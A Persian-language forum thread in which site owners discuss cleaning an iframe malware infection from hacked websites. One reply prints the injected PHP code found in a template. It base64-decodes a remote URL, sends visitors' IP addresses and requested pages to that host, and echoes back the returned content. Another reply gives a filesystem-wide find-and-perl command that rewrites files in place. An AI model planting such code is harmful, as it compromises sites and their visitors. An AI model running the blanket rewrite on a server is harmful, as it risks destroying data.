ویروس ifarm را چگونه حذف کنیم؟

[IFACO.Net]

فرمایشات شما کاملا متین ولی روش های بالا تست شد...
Avast یکی از بهترین هاست و تقریبا" 4 سالی است که استفاده می کنم و راضی هستم
اما برای حل این مشکل در سرور کافیست که دستور زیر را در ssh اجرا کنید تا کامل این کد از سایت های آلوده پاک شود :

Find / -type f -mtime -10 | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*\<iframe.*$/ /g'

به جای <iframe میبایست کدی که iframe به سایت آلوده اضافه می کند را وارد کنید.
البته تا 1 ساعت بعد از اجرای دستور صبر کنید تا جستجو انجام بشه و کد پاک بشود.
این دستور ابتدا کد را پیدا کرده در مرحله بعد پاک کرده و به جای کد iframe یک space قرار می دهد.

موفق باشید.

در کدوم قسمت کامندتون باید کد رو قرار بدند ، آیفرم اولی یا دومی ؟

[1Mizban]

سلام
متاسقانه سایت منم همین ویروس رو گرفته البته امروز گرفت وقتی آبدیت کردم
همه کد ها رو تست کردن هیچی اضافه نشده
سایت هم Html هستش
من فقط 2 تا فایل رو ادیت کردم ولی الان همه صفخات ایت جوری شده
برای من فقط یه کد تبلیغاتی هستش که به سایت دیگه رو باز میکنه
راهی نداره ؟

[maya2010]

واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.

[n4ser]

واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.

شما و همه دوستان توجه کنید وقتی ویندوز نصب کردین همون اول کار kasperski internet security2013 نصب کنید امنیت سیتم تضمین میکنه چون قدرتش خیلی بالا از cloud protection استفاده میکنه

[designer]

منم همین مشکل رو امشب تو سایتم دیدم اینم آی فرم که درستش کرده بود / این کد رو تو صفحه ایندکس قالب حذف کردم درست شد

کد:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

اگه نمی تونی درستش کنی پی ام بده خودم واست حلش میکنم

[maya2010]

دوستانی که iframe رو حذف میکنن و بعدش میگن درست شد توجه کنن همون صفحه بازم تا یکی دو هفته دیگه مجدد iframe میگیره.
من یه راه حل خود دارم:
1 - آنتی emisoft anti malware یا کسپر 2013 اول رو سیستموتون نصب کنید و اسکن کنید و همه تروجانها رو حذف کنید. (emisoft anti malware تخصصش شناسایی و حذف malware و تروجانه)
2 - به سایتتون رفته ویروس iframe رو از سایت حذف کرده و سطح دسترسی فایل های htm , html و java رو 444 بکنید.
دوستان اگه راه سریعتری دارن پیشنهاد بدن.